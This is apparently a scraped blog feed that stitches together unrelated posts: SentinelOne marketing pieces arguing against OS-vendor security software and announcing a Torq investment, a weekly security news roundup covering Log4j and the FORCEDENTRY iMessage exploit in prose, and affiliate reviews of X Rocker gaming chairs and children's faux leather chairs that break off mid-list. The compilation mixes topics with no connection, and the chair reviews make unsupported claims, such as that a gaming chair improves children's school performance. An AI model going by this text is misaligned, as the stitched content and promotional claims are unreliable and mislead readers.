Why Your Operating System Isn’t Your Cybersecurity Friend

/0 Comments/in /by

The primary objective in information security is to reduce the risk exposed through cyber threats towards an organization. To achieve that, security leaders aim to make informed decisions that allow their organization to best protect, detect, respond, and recover from cyber threats. Therefore, when looking into reducing risk, security leaders often choose to reduce significant dependencies in their enterprise architecture and procedures towards a particular vendor or capability.

That strategy makes good sense, but what about when you are considering security software? Some believe that OS vendor-supplied security software must be “safer” or less risky than that of 3rd party vendors. After all, this line of thinking goes, who knows the OS better than those who developed it?

Yet choosing security software sold by your operating system vendor increases your dependency on a single vendor, and in some of the most security-critical areas, too. In this post, we’ll review the pros and cons of relying on your OS vendor for security software, and we’ll take a look at what 3rd party vendors offer that an OS vendor cannot.

Security and Operating Systems | Expertise Matters

It goes without saying that the developer of any software knows that software best – they are after all, the owners of the source code – but we are where we are in cybersecurity in no small part because developers frequently fail to understand the security implications of their own products.

Responsible software companies implement bug bounty programs to invite external security specialists to audit their software, and this is no less true of OS vendors like Microsoft, Google, Apple and Red Hat Linux as it is of developers of browsers, and indeed, security software vendors, too. The more complex a piece of software, the more likely there are to be vulnerabilities, a fact borne out by recent CVE statistics in Microsoft Windows, for example.

  • In 2020, Microsoft confirmed 1,220 new vulnerabilities impacting their products, a 60% increase on the previous year.
  • 807 of 1,220 vulnerabilities were associated with Windows 10, with 107 of those related to code execution, 105 to overflows, 99 to gaining information, and 74 to gain privileges.
  • In 2021, 836 new vulnerabilities have been confirmed so far, 455 of which impact Windows 10 and 107 allow malicious code execution.
While this data refers to the most recent vulnerabilities, it’s also important to understand that many old vulnerabilities are still actively exploited by threat actors.

Operating system software is, and always will be, riddled with security vulnerabilities. Across Microsoft products, it is the Windows operating system where most security bugs are being found. Additionally, Microsoft has the highest rate of zero days compared to any other operating system vendor. Even more alarming is that most of these vulnerabilities relate to elevation of privilege or remote code execution: high risk vulnerabilities that threat actors can and do use to compromise organizations.

When a vendor is dealing with such an overwhelming amount of CVEs affecting so many different product lines, increasing your dependency on more products from that vendor requires a moment’s thought.

How much time and effort can the OS vendor extend to ensuring vulnerabilities in their security software offering are found and dealt with in a timely manner? A 3rd party vendor with a much smaller portfolio and expertise in security itself may be much-better placed to provide a reliable and effective security solution than an OS vendor with other priorities.

Moreover, with such a huge code base containing potentially vulnerable code, code dependencies in OS vendor products can present attackers with unexpected opportunities. For example, in 2021 SentinelLabs discovered a simple privilege escalation bug in Windows Defender that had been in the code since 2009.

CVE-2021-24092: 12 Years in Hiding
A Privilege Escalation Vulnerability in Windows Defender

Read Now

As we have seen, just because an OS vendor knows their own product better than anyone else, it doesn’t follow that they are best placed to understand or even deal with the security implications of that software. And the bigger and more complex the software, the more true that is going to be.

When you add all this together, it raises a troubling thought: is the vendor that is likely the source of the most vulnerabilities in your environment really the vendor you want to select for cybersecurity?

Nonetheless, perhaps there is another good argument for preferring security software from an OS vendor rather than a dedicated security solutions specialist: If one were looking for a turnkey solution, perhaps the OS vendor’s own security offering should be less hassle than installing a security solution from a third party vendor?

There are a number of issues to consider here; installation, licensing, cost, ease-of-use, integration, and, ultimately, the effectiveness of the protection.

E5 Licensing Complexities | What’s Not Included In The Box

Among the major OS vendors, Microsoft is unique in having chosen to develop and sell a product to protect its own operating system software. Arguably, there is a conflict of interest in a software company looking to build revenue by marketing a security product to protect its other products, and potential customers might wonder whether the engineering effort expended there would have been better spent on directly securing those products.

Even if organizations choose to pay the premium and procure Microsoft 365 E5 Security, Enterprise Mobility and Security E5, or Windows E5 licenses, they often discover after the fact that they end up requiring additional 3rd-party products to cover the gaps of Microsoft’s security portfolio:

  • When it comes to Extended Detection Response (XDR) solutions, the general consensus in the industry is that a solution must be able to perform 3rd-party data ingestion to perform cross-workload data analytics and response actions. Microsoft 365 Defender lacks the ability for 3rd-party data ingestion, so organizations are left with a technology that can only process its own dataset and therefore only protect the limited scope of Microsoft solutions.
  • Microsoft’s Endpoint Platform Protection (EPP) and Endpoint Detection Response (EDR) offering is called Microsoft Defender for Endpoint. The solution continues to lack in several critical areas including detection quality, automatic remediation of cyber threats on non-Windows 10 endpoints, and 1-click recovery from cyber threats.

Many customers evaluating Microsoft alongside SentinelOne consistently say that the “With E5 you have everything you need” claim of Microsoft turned out to be inaccurate. Once they began their evaluations, the gaps became significant, and over time compounded by the fact that Microsoft tends to introduce additional niche products.

For example, Microsoft recently made the decision not to support Kubernetes clusters and containers with Microsoft Defender for Endpoint; instead, they announced Microsoft Defender for Containers, yet another product which is not included in E5 and which again requires additional licenses, procurement, and deployment.

Beyond that, the procurement process can quickly become very complex as all the different products are spread across dozens of different licensing models in Microsoft Azure, Microsoft Windows, and Microsoft 365.

Some of these licensing models are per endpoint, others per user, and still others are pay-as-you-go. This plethora of offerings can make it extremely difficult to predict the actual cost of the platform for a business with multiple, complex needs.

In contrast, a solution like the Singularity platform has a very simple, straightforward licensing model where customers can choose between:

  • Singularity Core – On-device, NGAV with autonomous behavioral AI that does not rely on the cloud to detect, prevent and remediate file-based and fileless attacks, including ransomware.
  • Singularity Control – Singularity Core with additional endpoint control capabilities like firewall, device control, and more.
  • Singularity Complete – Singularity Control with additional Endpoint Detection Response (EDR), Cloud Workload Security, and Network Security capabilities.

All three options are licensed in a subscription model per agent/month, with no hidden costs.

Ease of Use and Integration

It’s a natural and expected consequence of using software from one vendor that, where they have other offerings, they will try to encourage take up of their other products. But one of the most important things for an enterprise when choosing security software is how it can reduce risk, decrease dependencies, and easily integrate with the rest of the security stack.

With Singularity XDR, organizations are able to gain unified visibility across their technology ecosystem, and benefit from unparalleled data analytics with centralized cross-workload response actions.

With this approach, SentinelOne customers have the flexibility they need in order to choose a best-of-breed strategy while being able to centralize into a unified security platform.

In contrast, Microsoft’s methodology pushes organizations into a closed ecosystem, which means increasing the dependency to a single vendor that can quickly become a single point of failure.

The Ultimate Test: Who Protects Best?

Every vendor will tell you they are better than the competition, and it’s vital for security leaders to look at independent 3rd-party evaluation like when comparing security products.

The most recent MITRE Engenuity ATT&CK Evaluation is a good place to start.

Despite the fact that the simulation took place predominantly on Windows, Microsoft’s own security product still had 23 missed detections. During the test, they paused the evaluation 35 times to perform configuration changes, including for their detection logics: a luxury an organization does not have in the real-world during a cyber-attack.

In comparison, SentinelOne had zero misses, zero configuration changes, and 100% visibility.

Taking Advantage of a Best-of-Breed Approach

Security leaders aware of the pitfalls we’ve mentioned above are choosing a best-of-breed approach and bringing in security-first vendors to partner with for their security requirements.

With Singularity, SentinelOne provides a best-in-class Extended Detection Response (XDR) platform that extends protection from the endpoint to beyond with visibility, proven protection, and unparalleled response:

  • One security console: Built for centralized & intuitive operations. Whether SOC analysts are chasing bad actors or security administrators need to configure device control policies, all can be achieved in one console.
  • Best-in-class EPP + EDR for modern threats: Every endpoint is equipped to prevent and detect with robust static & behavioral AI, even when offline.
  • Consistency: SentinelOne provides you consistency in terms of what features are available and ensures feature parity across Windows, macOS, and Linux.
  • Time-saving automation: Automatic attack reconstruction with Storyline™ technology, autonomous & 1-click remediation and patented rollback, dedicated in-house experts for MDR, DFIR, and threat hunting
SentinelOne Singularity XDR
See how SentinelOne XDR provides end-to-end enterprise visibility, powerful analytics, and automated response across your complete technology stack.

Learn More

Conclusion

Cybersecurity is all about managing risk as effectively as possible. There is no organization in the world that is immune to cyber threats. Over the years, security leaders have been required to make a choice between best-of-suite or best-of-breed approaches for their technology stack.

With the increasing complexity of cyber threats, the continuous increase of cyberattacks, and the increased dependency on operating system vendors, organizations are looking to partner with security-first companies that can provide a holistic approach to security.

If you would like to learn more about how SentinelOne can reduce cyber risk across your entire organization – Windows, Linux, macOS, IoT, mobile and cloud workloads – contact us or request a free demo.

X Rocker Gaming Chairs For Kids – Are They Worth A Buy?

/0 Comments/in /by

If you’re on the hunt for a gaming chair for your little one, there are a few things you should consider before making your purchase. X Rocker Gaming Chairs have become quite popular in recent years, but are they worth the investment?
Many kids dream of having the coolest gaming chair – and X Rocker Gaming Chairs are undoubtedly high on that list. But are they worth the money?

Why do kids need a gaming chair?

As you know, kids can spend hours playing video games. Unfortunately, they spend most of that time seated, leading to all kinds of posture problems.

A gaming chair is a perfect way to prevent these problems, as it keeps the spine in a neutral position. This is essential for growing bodies, as it helps them develop properly.

There are several models of gaming chairs for kids, but they all have one thing in common: they support your back and neck, so you can enjoy playing games without feeling any discomfort.

But it’s not just about offering comfort. A gaming chair is also one of the best ways to improve your performance when playing video games. You can lean back in this chair or lift your feet and place them on the rests without any problem – all while you’re focused on winning!

Why are X Rocker Gaming Chairs so popular?

X Rocker Gaming is a company that specializes in gaming accessories, such as wireless headphones and chairs for playing video games. They offer products that anyone can use- from professional gamers to casual players – and even children.

One of the reasons why their gaming chairs are so popular is that they come with many features. For example, the X Rocker Gaming Chair for Kids has built-in speakers that will immerse your child in the game. It also has a comfortable headrest and backrest to ensure your child stays seated for hours on end.

Another popular feature is the fact that most of these chairs are wireless. This means that you don’t have to worry about getting tangled in cables while you’re trying to concentrate on the game.

It is, therefore, no wonder that many parents are looking for X Rocker Gaming Chairs For Kids to help them play video games in the best possible conditions.

The X Rocker Gaming chairs are designed to be comfortable and improve your gaming experience. And, because they’re so popular, you can find a variety of models and designs to choose from.

What should you look for when buying an X Rocker Gaming Chair?

When looking for an X Rocker Gaming Chair, you should keep a few things in mind. As we mentioned before, these chairs are designed for comfort and to improve your playtime – so you should look for one that has all of the features you need.

Some of the features you should consider before buying include:

  • Number and positioning of speakers. The more speakers your chair has, the better it will sound – which is essential for immersing yourself in the game.
  • Comfort. You should check to make sure that the seat is comfortable enough to sit on for hours at a time and that it has excellent lumbar support.
  • Wireless technology. This is a must-have feature, as it will keep you from getting tangled in cables.
  • Style and design. You should choose a chair that matches your personality and gaming style.

On top of the features mentioned above, there are a few more things to think of since the gaming chair is for kids.

  • The chair should be lightweight, so your child can move it with ease after playing and prevent injuries when they pick it up.
  • The armrests should be adjustable because their size will change as time passes (and as your child grows).
  • You should make sure that the chair is easy to clean in case of any spills.
  • The chair should also have a warranty if something goes wrong with it.
  • The most important thing you should consider when buying an X Rocker Gaming Chair for your child is that the chair will fit them. It doesn’t matter how good the chair is – if it’s too small or too big, your child won’t be able to use it for as long as they should.

When looking for an X Rocker Gaming Chair, keep all of these factors in mind to ensure you’re getting the best possible product for your needs. And don’t forget to take into account your child’s specifics – their favorite color, for example.

The best X Rocker Gaming Chairs – the guide

In this guide, we’ll be talking about the different options you have when it comes to X Rocker Gaming Chairs For Kids. You will be able to compare the different models and prices, to make a wise choice when purchasing one of these chairs.

Floor Rocker Gaming Chairs

Floor gaming chairs are a great choice because they will keep your kids off the ground and offer a comfortable gaming experience.

These chairs are designed to be used while sitting on the floor – which offers a low-profile design and lots of stability.
Some of the best X Rocker Floor Gaming Chairs include:

X Rocker Surge Floor Gaming Chair

The X Rocker Surge is an excellent chair for both kids and adults. With its powerful subwoofer and two front-facing speakers, you’ll get exceptional sound and a slight rumble, emphasizing your game, movie, or music. You can play audio from any Bluetooth-enabled device wirelessly through the chair.

X Rocker Surge includes a cushioned backrest and arms for maximum comfort when gaming. The chair is covered in durable black vinyl and has a weight capacity of 275 pounds.

The audio control is located on the side of the chair and includes easy access volume, bass, and vibration controls. X Rocker Surge comes with a wireless receiver that you can plug into any RCA output jack on your TV or stereo system, making it great for gaming on your home theater system. The chair also folds up for easy storage and transport.

Dimensions: 36.81″D x 32.28″W x 20.89″H

X Rocker II SE Floor Gaming Chair

The X Rocker II SE is a comfortable and stylish gaming chair that’s great for playing video games, watching movies, or listening to your favorite tunes.

You can play your favorite games without being tangled up in cables with wireless audio. This chair has wireless audio transmission, two speakers near the headrest, and a subwoofer positioned to pound your back with bass-heavy sounds that will enhance your game, movie, or music.

Plug your headphones into the headphone jack and adjust the bass and volume control on the side jack to your liking. The Rocker II SE connects to Xbox, PlayStation, Gameboy, MP3/CD/DVD, and home theater systems.

The chair’s upholstery is black leather-like vinyl and is easy to clean. The X Rocker II SE has a weight capacity of 275 pounds and folds for easy storage.

Dimensions: 27.8″D x 18.5″W x 17.5″H

X Rocker Eclipse Floor Gaming Chair

The X Rocker Eclipse is an excellent choice for kids who want a comfortable gaming experience. The chair has two front-facing speakers to give you an immersive audio experience while gaming.
The sleek rocker design shifts and reclines to give you more comfortable playing positions during your most extended gaming sessions. The chair is covered in durable black vinyl and has a weight capacity of 275 pounds.
The simple design of this gaming chair will fit in any room. The stylish black and silver design complements your home, game room, bedroom, or dorm room with a modern feel.

Dimensions: 31″D x 27.5″W x 16.5″H

X Rocker Flash 2.0 Floor Gaming Chair

This gaming chair has an integrated 2.0 Wired Audio System with headrest-mounted speakers for enhanced immersion in video games. It’s easily connected to most gaming systems – all you have to do is connect it to your device.

The X Rocker Flash 2.0 High Tech Audio Wired Gaming Chair’s rocking design provides smooth movement and reclines for ideal gaming positions throughout your longest missions in the game. This flexible chair is suitable for living rooms, game rooms, bedrooms, dorm rooms, or your favorite gaming area. It is also great for watching movies, reading, and lounging.

Have we mentioned how easy it is to maintain? The Flash 2.0 chair is easy to clean with a simple wipe down. Fold it down for easy storage and transport.

Dimensions: 30.71″D x 16.54″W x 26.77″H

X Rocker Lux 2.0 Floor Gaming Chair

The X Rocker Lux 2.0 Bluetooth is a lightweight yet comfortable floor gaming chair for children and players of all ages.
This chair comes with a discreet headrest-mounted 2.0 Bluetooth sound system that improves your audio experience when playing games, watching films, or listening to music.

This exquisite limited edition folding floor rocker is embellished with an eSports-inspired design and features a rich black and gold faux leather covering for added comfort, as well as a sleek black frame that folds down to store.

Fully-padded arms, a high backrest, and a durable black nylon rocker base are just some of the other features contributing to this chair’s comfortable design.

Dimensions: 31.1″ D x 18.11″ W x 29.72″ H
Weight Limit: 240 lbs

X Rocker Spade Floor Gaming Chair

The X Rocker Spade 2.1 is a portable and foldable rocker chair that can handle all of your gaming requirements; the integrated audio and subwoofer system produces an incredible sound experience while playing games, listening to music, or watching movies. Deep foam padding, which is ergonomically designed and offers long-term comfort while gaming, allows extended gameplay.

The X Rocker Spade 2.1 floor chair has a durable nylon base that allows you to game with precision and accuracy. You can find an ideal position that provides the ultimate playing experience, whether you’re rocking back and forth or staying still; the Spade 2.1’s headrest design will give you access to many different positions.

The foldable and portable design allows for easy transport and storage. This chair can be stored away in a closet, under the bed, or even behind the couch, so you always have a place to sit when it comes to gaming time.

Dimensions: 29.53″D x 16.9″W x 28.15″H

X Rocker Limewire Floor Gaming Chair

The X Rocker Limewire 2.1 BT Floor Rocker is designed for both casual and professional gamers, allowing them to not only hear the game’s noises but also feel them. The game chair is made with high-tech materials, and it has a built-in 2.1 Bluetooth Audio System with headrest-mounted speakers and a subwoofer located at the back to give you the sensation that you’re in the game.

The chair is compatible with various gaming systems and wireless devices, allowing you to enjoy video games, movies, music, and more.

The adjustable armrests on the rocking design with cushioned resting supports allow you to play in several positions throughout your most prolonged gaming sessions. The modern black and green pattern fits in well with most décor styles.

Measurements: 36.2″D x 31.5″W x 20.8″H

X Rocker Pro Series H3 Floor Gaming Chair

The ultimate all-purpose gaming chair! A leather lounging game chair may be used to play video games, watch movies and TV, listen to music, read, and unwind.

Four forward-pointing speakers, audio force modulation technology, and ported power subwoofers are combined in the chair’s open area for complete immersion in your gaming, movie, or music experience.

The Pro Series H3 has extra vibration motors that sync with your music’s bass tones to deliver an even more powerful whole-body feeling that will keep you comfortable and amused for hours.

This gaming chair is compatible with all gaming consoles. It comes with a built-in amplifier for high-quality sound, speakers flanked on both sides of the chair, and controls for volume, bass, and vibration.

The X Rocker Pro Series H3 is made of durable wood and metal frame covered with padded vinyl. The weight capacity is 275 pounds.

Dimensions: 35″D x 22″W x 34.5″H

X Rocker Emerald RGB Floor Gaming Chair

This sophisticated chair has an integrated 2.0 Wired Audio System with headrest-mounted speakers and a backrest subwoofer to immerse you in the game.

The chair’s high-quality hooded design, complete with a softly curved armrest and backrest, makes it stylish and comfortable. It also has RGB LED technology built-in for lighting effects that can be modified using the touch of a button.

Although this gaming chair is not wireless, it does have a built-in headphone jack and volume control for personal listening. With a weight capacity of 250 pounds, the X Rocker Emerald RGB is great for both children and adults.

Measurements: 30.3″D x 26.4″W x 22.2″H

X Rocker Extreme III Floor Gaming Chair

The X Rocker Extreme is great for gaming, watching movies and TV shows, and listening to music. A built-in 2.1 Speaker System with a subwoofer and amplifier puts out 30 watts of sound for impactful bass and overall audio quality.

The unique, full-bodied sound system chair provides you with total media immersion and has been carefully built to boost the sound quality and enhance your experience.

The X Rocker’s speakers and its ported power subwoofers are boosted by the open area inside the X Rocker rather than simply the frame, resulting in improved sound quality.

The chair has a sturdy wood frame and is covered with durable faux leather for optimal comfort. It provides excellent support, making it great for people of all ages and sizes. The weight capacity is 275 pounds.

Dimensions: 26″D x 17.5″W x 17″H

X Rocker Pedestal Chairs

Not all want to sit that close to the floor, and that’s ok! If you are looking for a gaming chair in a more traditional form, The X Rocker Pedestal Chairs might be exactly what you’re looking for!

X Rocker Vibe Gaming Chair

With a beautiful, breathable fabric back and seat, high back tilt & swivel pedestal gaming chair may be used to play video games, watch movies, listen to music, read, and unwind. You will not want to get up!
Integrated with two 2.0 speakers and a powerful subwoofer, the X Rocker Vibe creates an experience that will keep you captivated and relaxed for hours on end.
Vibe 2.1 Bluetooth Pedestal Gaming Chair has extra vibration motors that sync with your audio’s bass tones to provide an even more powerful full-body sensation, keeping you comfortable and engaged at the same time.
The chair’s ergonomic design includes a headrest and lumbar support for additional comfort. The X Rocker Vibe can be used with all gaming consoles and has a weight capacity of 250 pounds.

Dimensions: 33.86″D x 40.55″W x 23.62″H

X Rocker Covert Gaming Chair

This chair is designed for the modern gamer. It has a sleek, low-profile design and is made of vinyl and metal. The Covert is lightweight and easy to move around, making it perfect for use at home or LAN parties.

The built-in 2.1 audio system provides high-quality sound and powerful bass. At the same time, the included wireless transmitter allows you to connect wirelessly to your game console or PC. 2 subwoofers make sure that you will feel that bass!

The unique design adjusts to your body rather than forcing you to change, providing superior comfort. Lumbar and neck support for extra comfort make it ideal for long-haul missions in the game.

Dimensions: 30.71″D x 25.19″W x 37.6″H

X Rocker Falcon Gaming Chair

The low-slung X Rocker Falcon Pedestal is as ergonomic as gaming chairs get, although it sits somewhat lower than most others on the market – therefore, it is more suitable for children.

On the other hand, the distinctive design provides maximum stability thanks to the enormous pedestal base. The use of a lumbar roll relieves pressure on the spine, allowing for more blood flow and nutrients to reach the lower back. In addition, it minimizes fatigue and soreness by extending blood flow and nutrient availability. The X Rocker Falcon is comfortable and safe for developing gamers.

How are the other technical specifications of X Rocker Falcon? The 2.1 wireless integrated sound system is one of the appealing aspects of the Falcon Pedestal Gaming Chair. There are seated speakers, and a rearrest subwoofer to make you feel like you’re actually inside the game. The whole set is mounted on a unique pedestal base with good stability and enormous surface area.

The X Rocker Falcon Pedestal offers three different sound options: Bluetooth, RCA (stereo), and headphone jacks (3.5mm). The wireless RCA or stereo jack connectivity ensures that you can connect the device to your favorite gaming console, laptop, or media player. The X Rocker Falcon Pedestal Gaming Chair is designed to work with almost every operating system available.

Dimensions: 32″D x 25″W x 42″H

X Rocker Mammoth Gaming Chair

The X Rocker Mammoth has a durable faux leather covering and an ultra-padded seat. Because of that, it is one of the most comfortable gaming chairs on the market.

In addition, it comes with a built-in 2.1 amplifier for high-quality sound, speakers on either side of the chair, and has controls for bass, volume, and vibration. With the top-of-the-line 2.1 Dual audio system, you may link to all of your favorite gaming systems, including PlayStation 4, Xbox One, and Nintendo Switch. The sound-reactive vibration motors add to your gaming experience, while an elevated pedestal base keeps you off the floor for extended periods of fun and entertainment.

The X Rocker Mammoth gaming chair is also built with solid wood and a metal frame that can hold up to 300 pounds.

Measurements: 32″D x 40.9″W x 26″H

X Rocker RGB Prism Gaming Chair

Would your child like a bit of color to the gaming equipment? The surface of X Rocker RGB Prism is illuminated by RGB LED technology and may be customized with over 30 color and pattern options that may all be altered using a touch of a button.

But looks aside, this gaming chair also offers an ergonomic design for superior comfort. The backrest is adjustable to conform to the natural curvature of your spine, and the two speakers are placed on either side to give you an immersive audio experience. The chair is made with a vinyl and metal frame designed to last, and it can hold up to 300 pounds.

The Bluetooth/Wireless technology lets you connect to any gaming device in your home, and the 3.5mm stereo jack allows you easily connect to any audio device. The chair also has an integrated control panel to adjust the sound, bass, and vibration.

The X Rocker RGB Prism gaming chair is perfect for children and adults alike, and it can be used with any gaming system.

Measurements: 33″D x 25″W x 45″H

Are X Rocker Gaming Chairs For Kids worth the investment?

X Rocker Gaming Chairs are not cheap. If you’re planning to get one for your child – or even for yourself- you’ll need to be prepared to spend a few hundred dollars on it. However, even if they seem very expensive, you should know that these chairs are built to last.

They’re not only ergonomically designed and incredibly comfortable, but also quite sturdy and very durable. This means the chair won’t tip over or break down easily.

Are X Rocker Gaming Chairs worth it, especially for kids? From our point of view, the answer is definitely “yes”! Not only do these chairs provide great comfort and improve gaming performance, but they’re also built to last. If you’re looking for a gaming chair that will make your child happy and comfortable and give them outstanding performance while playing video games, this is an excellent choice.

A fantastic video game chair can make your kid’s experience much better by enhancing their focus & improving their reaction time (allowing them to respond quickly to winning the game). A video game chair that enhances kids’ performance in school or any other activity is a “must-have” for any parent.

The post X Rocker Gaming Chairs For Kids – Are They Worth A Buy? appeared first on Comfy Bummy.

The Good, the Bad and the Ugly in Cybersecurity – Week 51

/0 Comments/in /by

The Good

Great news this week as details emerged of an operation in which law enforcement arrested 51 individuals accused of illegally trading the personal data of U.S., European and Ukrainian citizens. Cyber cops in Ukraine carried out raids in which around 100 databases containing stolen personal data spanning 2020-2021 were seized.

The databases reportedly contained information on some 300 million citizens of Ukraine, Europe and the United States. Depending on their content, the databases were sold from anywhere between $18 and $1800 a time. Police said they had also shut down a large site where the data was traded and blocked 30 other channels involved in the illegal dissemination of data.

19 suspects have already been charged, with more expected to follow. Ukrainian authorities said that data theft had become increasingly attractive as the number of owners and managers of personal data in the private sector had increased. This presents new challenges as many of these entities struggled with how to prevent and contain data breaches against determined, financially-motivated hackers.

The Bad

“The internet is on fire”, it was declared earlier this week, and the inferno continues to rage in the wake of the Apache Log4j2 vulnerabilities, more formerly tracked as CVE-2021-44228 and CVE-2021-45046. Admins everywhere have been scrambling to find out how exposed they are to the critical remote code execution vulnerabilities in Apache’s Java logging library.

The first vulnerability affects Log4j2 versions 2.0 beta9 to 2.14.1. This was patched in version 2.15.0 released this week, but a second vulnerability that could allow a denial of service (DOS) attack in certain non-default configurations was subsequently discovered. That means administrators need to ensure affected products are updated to Log4j2 v2.16.0.

Infosec itself lost no time in coming up with proof-of-concept exploit code and threat actors were also quick off the mark with cryptominer payloads. In the midst of the panic, predictions of widespread nation-state actor attacks and ransomware incidents have been rife, but none so far have come to light. Expect that to change, is the message everyone should be hearing.

Windows and Linux devices are particularly at risk. macOS hasn’t shipped with Java for over a decade, but there are plenty of macOS applications that require a 3rd party JRE, including Crashplan, Ghidra, Jamf Pro and Gradle. Apple’s own Xcode 13.2 also contains a vulnerable version of log4j2, though it’s unclear at this time how that could be exploited.

Organizations are urged to discover all internet-facing assets which use Log4j and that allow data input, to update or isolate those assets, and to monitor for anomalous traffic patterns, particularly around outbound JDNI LDAP/RMI traffic and DMZ-initiated outbound connections.

The Ugly

Sometimes, you have to just sit back and admire the dedication of both attackers and defenders to come up with, and discover, novel attacks. This week, hats off to Google’s Project Zero team for reversing and describing one of those “you wouldn’t believe it if it was in a movie” exploits, a nasty, clever, almost-impossible-to-believe exploit of Apple’s iMessage format that was used to target dissidents.

The zero-click exploit, which Project Zero describes as “one of the most technically sophisticated exploits we’ve ever seen”, was developed by the ever-notorious NSO group and sold to unknown regimes around the world. It came to light after Citizen Lab caught the zero-click exploit being used to target a Saudi activist.

The attack begins with a maliciously-crafted PDF file with a .gif file extension being sent to the target. The victim need not read or even open the message; all that is required is that the device receives it. On receipt of the iMessage and fake GIF file, Core Graphics APIs are called into action to parse the file. Here’s where things get crazy.

A zero-day vulnerability (now tracked as CVE-2021-30860) in the open-source PDF parser used by Apple allowed the attackers to construct an entire emulated computer architecture inside the parser’s JBIG2 decompression stream. As explained by Google’s Ian Beer and Samuel Groß:

“Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture…the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It’s pretty incredible, and at the same time, pretty terrifying.”

The full details are well worth a read for anyone interested in just what can be done with what started, after all is said and done, from a simple integer overflow. The resulting exploit, aka FORCEDENTRY, was patched by Apple back in September and affects iOS 14.7 and earlier, all versions of macOS Big Sur prior to 11.6, and watchOS 7.6.1 and earlier.

Reducing Human Effort in Cybersecurity | Why We Are Investing in Torq’s Automation Platform

/0 Comments/in /by

At SentinelOne, we were delighted to play our part in helping Torq raise $50m in its Series B funding last week. We believe Torq’s no-coding approach to automation will facilitate more complex workflows to respond to threats and play an essential role in developing XDR. Torq is on a mission to reinvent automation for security teams, a mission we at SentinelOne fully support. The importance of automation – of taking human effort out of the security equation – is central to our philosophy.

What is Torq?

Torq is a platform built around world-class automation, best practices templates, connectivity, and data tools. Torq aims to let security professionals connect to any security system needed and easily build automated workflows with a no-code approach.

Automation helps teams do more with limited resources, spend more time on the most valuable work, increase productivity, and leads to less burnout and better team retention.

Torq and the SentinelOne Platform

SentinelOne customers will find a variety of use-cases for Torq, including:

  • Supercharge Your Threat Hunting – create automated workflows to look for specific indicators across a fleet of SentinelOne-protected-endpoints, allowing teams either to efficiently investigate the devices where they are found or automate adding items to block lists.
  • Enrich Your Threat Intelligence – for every threat discovered on a SentinelOne-protected endpoint, automate additional analyses, update results within the SentinelOne platform and add automated notes.

More generally, security teams can add Torq workflows for

  • Responding to Suspicious User Activity – when detected, send a verification to the user via Slack. Either allow the action (if the user verifies) or quarantine the account or endpoint if not.
  • Remediating CSPM – automatically remediate simple issues, route alerts to multiple teams for fixes, create ‘recommended action’ buttons in Jira, Slack, and other systems
  • Easily onboarding/offboarding – orchestrate policy updates across all systems and automatically trigger flows. Require approvals for granting/removing sensitive permissions.

Why We’re Excited to See Torq Succeed

Decoupling automation and remediation from SOAR and enabling integration with agnostic data sources to facilitate more complex workflows to respond or even assert a proactive posture against threats is one of the keys to an open XDR offering. Torq’s no-code approach delivers on this vision and provides an approachable visual and declarative means of authoring automation for security experts and novices, which is critical given the deficit in security professionals in our field.

We commend Torq for building a top-notch engineering team that delivers a simple, intuitive user experience that abstracts a very robust and well-thought-out platform. We are very excited to partner with the Torq team.

If you’d like to learn more about SentinelOne and Torq, contact us or request a free demo.

Is A Leather Chair Suitable For Kids?

/0 Comments/in /by

Parents looking for stylish kids’ furniture that is both comfortable and affordable may want to consider the many benefits of leather chairs. Leather chair lounge designs have been around since ancient times, but they have become more modernized with time. In addition to being classy and quite comfortable, quality leather children’s furniture can be a great investment.

Regardless of the reasons for seeking new kids’ furniture, leather lounge chairs are an excellent choice. They are not only comfortable, but they come in many different colors and designs to satisfy your child’s personal taste. Leather lounge chairs for kids can look great in any bedroom or playroom and provide comfort and function.
If you want to make a statement, leather chair designs will do it for you.

There are a few things to consider when purchasing leather chairs for kids:

  • The age of your child. Depending on their size, a leather chair may be too big or too small for them. It is important to find furniture that is both comfortable and manageable for your child to use.
  • Additionally, you will want to take into consideration their specific tastes. Some children want certain styles, while others prefer a more neutral style that would go with any décor.
  • Sustainability and eco-friendliness are other factors that should be considered when purchasing any type of furniture, but it is essential when purchasing items for kids. You want to make sure that neither you nor your little one has an issue with animal rights.

Faux leather chairs for kids – is it an alternative for kids’ leather chairs?

Leather as a material has a lot of benefits. It is not only comfortable, but it can last long and also adds a luxurious look to your house. Kids’ furniture made of leather is no exception. However, many feel that animal-based materials are cruel. Therefore, kids’ faux leather chairs have become very popular in today’s marketplace.

If you’re looking for a more affordable, animal-friendly option, faux leather chairs for kids may be the right choice for you. Faux leather is made from synthetic materials that look and feel like genuine leather. This makes it an excellent alternative for parents who want the look and feel of leather furniture but don’t want to harm any animals.

Faux leather chairs come in various colors and designs so that you can find the perfect one for your child’s bedroom or playroom. They are also very affordable, making them a great choice for parents on a budget.

Like leather furniture, it is important to consider your child’s age and taste when choosing faux leather chairs. Be sure to buy one that is the right size for your little one and one that they will be comfortable sitting in.

If you’re looking for a stylish, affordable addition to your child’s bedroom or playroom, faux leather kids’ chairs are an excellent choice!

Best Kids’ Faux Leather Chairs – Your Children Will Love Them

If you’re shopping for a lower-priced but high-quality kids’ chair, you will want to consider the kids’ faux leather chairs available from Amazon.com. We have gathered five of the best-selling and highest-rated faux leather chairs for kids on Amazon, so you can be sure your child will love their new chair.

Baby Care Leather Kids Sofa

The Baby Care Leather Kids Sofa is the perfect size for toddlers. It provides a comfortable and cozy place for your little one to relax. They will love crawling into this soft, faux leather chair to read their favorite book or watch cartoons.

The Baby Care Leather Kids Sofa is made of soffkin fabric, a type of synthetic leather. This makes it a durable and easy-to-clean chair. It is also waterproof and has antibacterial properties, making it a safe choice for kids.

The Baby Care Leather Kids Sofa receives 5 stars out of 5 on Amazon from over 100 reviews. Parents love the durable and waterproof material that this chair is made with. They also like how comfortable it is and rave about their children loving to sit in it.

Melissa & Doug Brown Coffee Faux Leather Child’s Armchair

The Melissa & Doug Child’s Armchair is a pleasant and well-made chair for toddlers and preschoolers. The faux leather kids’ chair comes in five colors: coffee, brown faux leather, denim, and pink. It is also an Amazon Exclusive, so you can only buy it there.

This kids’ armchair accommodates children aged three years and up, providing them the ideal cozy location to snuggle with their favorite toy, book, game, or activity. It can support a weight of up to 100 pounds.

The Melissa & Doug Brown Coffee Faux Leather Child’s Armchair receives 4.8 stars out of 5 on Amazon from over 500 reviews. Parents love how sturdy this chair is and how well the faux leather material holds up against their children’s wear and tear.

Amazon Basics Faux Leather Kids/Youth Recliner with Armrest Storage

